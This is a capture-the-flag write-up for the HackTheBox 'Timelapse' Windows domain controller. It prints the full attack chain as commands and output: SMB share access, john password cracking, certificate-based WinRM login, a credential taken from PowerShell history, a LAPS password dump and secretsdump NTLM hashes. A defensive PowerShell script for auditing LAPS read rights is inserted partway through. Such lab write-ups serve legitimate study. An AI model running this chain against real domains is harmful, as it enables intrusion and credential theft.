Basic information

Port scan

Clearly a Windows domain machine (DNS, Kerberos, LDAP and SMB all exposed by a host named DC01):

$ nmap -sC -sV -Pn 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 13:32 CST
Nmap scan report for 10.10.11.152
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-07 13:34:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-07T13:34:50
|_ start_date: N/A
|_clock-skew: 7h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.96 seconds

SMB

SMB allows unauthenticated access, and there is a share named Shares:

Shares

It contains two directories: Dev holds a WinRM backup, and HelpDesk holds LAPS-related files:

winrm_backup.zip

The archive is password-protected, but the password can be cracked:

zip2john winrm_backup.zip > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
supremelegacy

Extracting it yields a .pfx certificate file, which also needs a password; crack it with john as well:

pfx2john legacyy_dev_auth.pfx > hash2.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
thuglegacy

The file name shows that this is the client authentication certificate used for WinRM, so the plan is to extract the key from the .pfx and connect over WinRM with it.

user flag

Extract the key and certificate; wherever a password is requested, use the cracked certificate password:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt

evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S

Privilege escalation information

Running winPEAS or a similar tool reveals a password in the PowerShell command history file:

type C:\Users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

laps

LAPS files were seen earlier in the share; the next step is to use the svc_deploy account to dump the LAPS passwords:

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

DC01 dc01.timelapse.htb kF5xw4;8rU#Tv0xn2O#{v0Pl 132942063964961821
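As an added defensive check that is not part of this write-up: the LAPS read above works only because some principal (here the svc_deploy account) has been delegated the extended right on the ms-Mcs-AdmPwd attribute. This PowerShell audit lists who holds that right on each computer object; it assumes the RSAT ActiveDirectory module, the LAPS v1 attribute name used on this page, and an account permitted to read object ACLs.

```powershell
# Added audit script (not from the original write-up): list every principal granted the
# extended right needed to read the LAPS v1 password attribute (ms-Mcs-AdmPwd) per computer.
# Assumes the RSAT ActiveDirectory module and an account that can read security descriptors.
Import-Module ActiveDirectory

# Resolve the schema GUID of ms-Mcs-AdmPwd instead of hard-coding it.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$attrObject = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $attrObject) { throw 'ms-Mcs-AdmPwd is not in the schema: LAPS v1 is not deployed here.' }
$admPwdGuid = [guid]$attrObject.schemaIDGUID
$allGuid    = [guid]'00000000-0000-0000-0000-000000000000'   # ACE that covers every attribute
$extRight   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

function Get-LapsPasswordReaders {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    Get-ADComputer -Filter * -SearchBase $SearchBase | ForEach-Object {
        $computer = $_
        # The AD: PSDrive is provided by the ActiveDirectory module.
        $acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
        foreach ($ace in $acl.Access) {
            # Reading a confidential attribute needs CONTROL_ACCESS (ExtendedRight) scoped to
            # the attribute itself or to all attributes; GenericAll includes that bit too.
            $hasExtRight = ($ace.ActiveDirectoryRights -band $extRight) -eq $extRight
            $scoped      = ($ace.ObjectType -eq $admPwdGuid) -or ($ace.ObjectType -eq $allGuid)
            if ($ace.AccessControlType -eq 'Allow' -and $hasExtRight -and $scoped) {
                [pscustomobject]@{
                    Computer  = $computer.Name
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.ActiveDirectoryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Review non-default principals first; a service account or broad group here is the finding.
Get-LapsPasswordReaders | Sort-Object Computer, Principal | Format-Table -AutoSize
```

On a domain like the one above, the output would show the group or account that svc_deploy belongs to alongside the expected Domain Admins and SYSTEM entries.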

root flag

The password obtained from LAPS is the local Administrator password; root.txt is on the desktop of the TRX user:

hashes

└─$ impacket-secretsdump -just-dc-ntlm Administrator@10.10.11.152
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de0a7e3d696666f33e663464f1800940:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:cac5b5386bf075ebd4699b205150cd52:::
DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Cleaning up...

References